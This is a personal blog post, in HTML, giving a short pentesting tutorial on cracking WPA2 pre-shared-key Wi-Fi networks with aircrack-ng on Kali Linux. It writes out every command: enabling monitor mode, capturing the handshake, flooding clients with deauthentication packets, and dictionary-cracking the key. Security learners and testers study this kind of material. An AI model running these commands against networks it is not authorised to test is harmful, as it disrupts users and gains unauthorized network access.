<!DOCTYPE html>
<html lang="en">
  <head>
    
      <title>
        Cracking WPA2 ::
        Andy Sukowski-Bang — Math Major &amp; Programmer
      </title>
    
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta
  name="description"
  content="This short tutorial walks you through cracking WPA2 networks which use pre-shared keys using the aircrack-ng suite of tools to assess WI-FI network security. All of the necessary tools come preinstalled with the Kali Linux distribution. The # in front of commands means, that they have to be executed as the root user, e.g. using sudo.
Wireless card into monitor mode # List all possible programs that could interfere with the wireless card."
/>
<meta
  name="keywords"
  content=""
/>
<meta name="robots" content="noodp" />
<link rel="canonical" href="https://andy-sb.com/posts/cracking-wpa2/" />







<link rel="stylesheet" href="/css/style.css" />

<link rel="stylesheet" href="https://andy-sb.com/style.css" />


<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://andy-sb.com/img/apple-touch-icon-144-precomposed.png" />
<link rel="shortcut icon" href="https://andy-sb.com/img/favicon.png" />


<link href="/fonts/Inter-Italic.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/Inter-Regular.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/Inter-Medium.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/Inter-MediumItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/Inter-Bold.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/Inter-BoldItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/IBM-Plex-Mono-Regular.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/IBM-Plex-Mono-Italic.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/IBM-Plex-Mono-Bold.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">
<link href="/fonts/IBM-Plex-Mono-BoldItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin="">


<meta name="twitter:card" content="summary"/><meta name="twitter:title" content="Cracking WPA2"/>
<meta name="twitter:description" content="This short tutorial walks you through cracking WPA2 networks which use pre-shared keys using the [aircrack-ng](https://www.aircrack-ng.org) suite of tools to assess WI-FI network security. All of the necessary tools come preinstalled with the [Kali Linux](https://www.kali.org) distribution."/>



<meta property="og:title" content="Cracking WPA2" />
<meta property="og:description" content="This short tutorial walks you through cracking WPA2 networks which use pre-shared keys using the [aircrack-ng](https://www.aircrack-ng.org) suite of tools to assess WI-FI network security. All of the necessary tools come preinstalled with the [Kali Linux](https://www.kali.org) distribution." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://andy-sb.com/posts/cracking-wpa2/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2023-07-11T12:36:55+02:00" />
<meta property="article:modified_time" content="2023-07-11T12:36:55+02:00" /><meta property="og:site_name" content="Andy Sukowski-Bang" />









  </head>
  <body >
    <div class="container">
      <header class="header">
  <span class="header__inner">
    <a
  href="/"
  class="logo"
  style="text-decoration: none;"
>
  
    <span class="logo__mark"><svg xmlns="http://www.w3.org/2000/svg" class="greater-icon" viewBox="0 0 44 44">
  <path fill="none" d="M15 8l14.729 14.382L15 35.367" />
</svg>
</span>
    <span class="logo__text"
      >cd ~/</span
    >
    
  
</a>

    <span class="header__right">
      
        <nav class="menu">
  <ul class="menu__inner menu__inner--desktop">
    
      
        
          <li><a href="/posts">Blog</a></li>
        
      
        
          <li><a href="/pgp">PGP</a></li>
        
      
        
          <li><a href="/xmr">XMR</a></li>
        
      
      
      
  </ul>

  <ul class="menu__inner menu__inner--mobile">
    
      
        <li><a href="/posts">Blog</a></li>
      
    
      
        <li><a href="/pgp">PGP</a></li>
      
    
      
        <li><a href="/xmr">XMR</a></li>
      
    
  </ul>
</nav>

        <span class="menu-trigger">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
            <path d="M0 0h24v24H0z" fill="none" />
            <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z" />
          </svg>
        </span>
      
      <span class="theme-toggle">
        <svg
  class="theme-toggler"
  width="24"
  height="24"
  viewBox="0 0 48 48"
  fill="none"
  xmlns="http://www.w3.org/2000/svg"
>
  <path
    d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"
  />
</svg>

      </span>
    </span>
  </span>
</header>


      <div class="content">
        
  
  

  <article class="post">
    <h1 class="post-title">Cracking WPA2</h1>
    <div class="post-meta">
      
        <time class="post-date">
          2023-07-11
        </time>

        
          
        
      

      
        <span class="post-author"
          >— Written by Andy Sukowski-Bang</span
        >


      
    </div>

    
      <span class="post-tags">
        
          <a href="https://andy-sb.com/tags/pentesting/">#pentesting</a>&nbsp;
        
          <a href="https://andy-sb.com/tags/linux/">#linux</a>&nbsp;
        
      </span>
    

    

    <div class="post-content">
      
      <p>This short tutorial walks you through cracking WPA2 networks which use
pre-shared keys using the <a href="https://www.aircrack-ng.org">aircrack-ng</a> suite of tools to assess WI-FI
network security. All of the necessary tools come preinstalled with the <a href="https://www.kali.org">Kali
Linux</a> distribution. The <code>#</code> in front of commands means, that they have to
be executed as the <code>root</code> user, e.g. using <code>sudo</code>.</p>
<h2 id="wireless-card-into-monitor-mode">
  Wireless card into monitor mode
  <a href="#wireless-card-into-monitor-mode" class="h-anchor" aria-hidden="true">#</a>
</h2>
<p>List all possible programs that could interfere with the wireless card. If
<code>kill</code> is specified, it will try to kill all of them.</p>
<pre tabindex="0"><code># airmon-ng check kill
</code></pre><p>Enable monitor mode on an interface (here it&rsquo;s <code>wlan0</code>) and check if it worked.</p>
<pre tabindex="0"><code># airmon-ng start wlan0
# airmon-ng
</code></pre><h2 id="capture-handshake">
  Capture handshake
  <a href="#capture-handshake" class="h-anchor" aria-hidden="true">#</a>
</h2>
<p>List Wi-Fi networks and their BSSIDs, Channels, etc.</p>
<pre tabindex="0"><code># airodump-ng wlan0mon
</code></pre><p>Narrow search down to specific BSSID (MAC address).</p>
<pre tabindex="0"><code># airodump-ng wlan0mon -d &lt;BSSID&gt;
</code></pre><p>Capture WPA2 handshake and write it to file (e.g. <code>handshake-01.cap</code>). Remember
to change interface name, if needed.</p>
<pre tabindex="0"><code># airodump-ng -w handshake -c &lt;channel&gt; --bssid &lt;BSSID&gt; wlan0mon
</code></pre><p><strong>Optional in other terminal:</strong> Simultaniously send deauthentication packets to
clients on the network to capture WPA2 handshake by forcing clients to
reauthenticate. Without this step, it might take some time to capture the
handshake.</p>
<pre tabindex="0"><code># aireplay-ng --deauth 0 -a &lt;BSSID&gt; wlan0mon
</code></pre><h2 id="crack-password">
  Crack password
  <a href="#crack-password" class="h-anchor" aria-hidden="true">#</a>
</h2>
<p>After storing the handshake in e.g. <code>handshake-01.cap</code>, we can finally crack the
password using <code>aircrack-ng</code>.</p>
<pre tabindex="0"><code># aircrack-ng handshake-01.cap -w dictionary.txt
</code></pre><p>Alternatively, we can extract the handshake from the <code>.cap</code> capture file and
convert it to a modern hashcat compatible hash file using
<a href="https://hashcat.net/cap2hashcat">hashcat.net/cap2hashcat</a>, which can then be cracked using <a href="https://hashcat.net/hashcat">hashcat</a>.</p>

    </div>
    
      
        <div class="pagination">
          <div class="pagination__title">
            <span class="pagination__title-h"
              >Read other posts</span
            >
            <hr />
          </div>
          <div class="pagination__buttons">
            
            
              <span class="button next">
                <a href="https://andy-sb.com/posts/networking/">
                  <span class="button__text">Networking cheat sheet</span>
                  <span class="button__icon">→</span>
                </a>
              </span>
            
          </div>
        </div>
      
    

    
      
        

      
    
  </article>

      </div>

      
        <footer class="footer">
  <div class="footer__inner">
    
      <a
  href="/"
  class="logo"
  style="text-decoration: none;"
>
  
    <span class="logo__mark"><svg xmlns="http://www.w3.org/2000/svg" class="greater-icon" viewBox="0 0 44 44">
  <path fill="none" d="M15 8l14.729 14.382L15 35.367" />
</svg>
</span>
    <span class="logo__text"
      >cd ~/</span
    >
    
  
</a>

      <div class="copyright">
        <span>© 2024 Andy Sukowski-Bang</span>
      </div>
    
  </div>
</footer>




<script type="text/javascript" src="/bundle.min.js"></script>


      
    </div>

    
  </body>
</html>
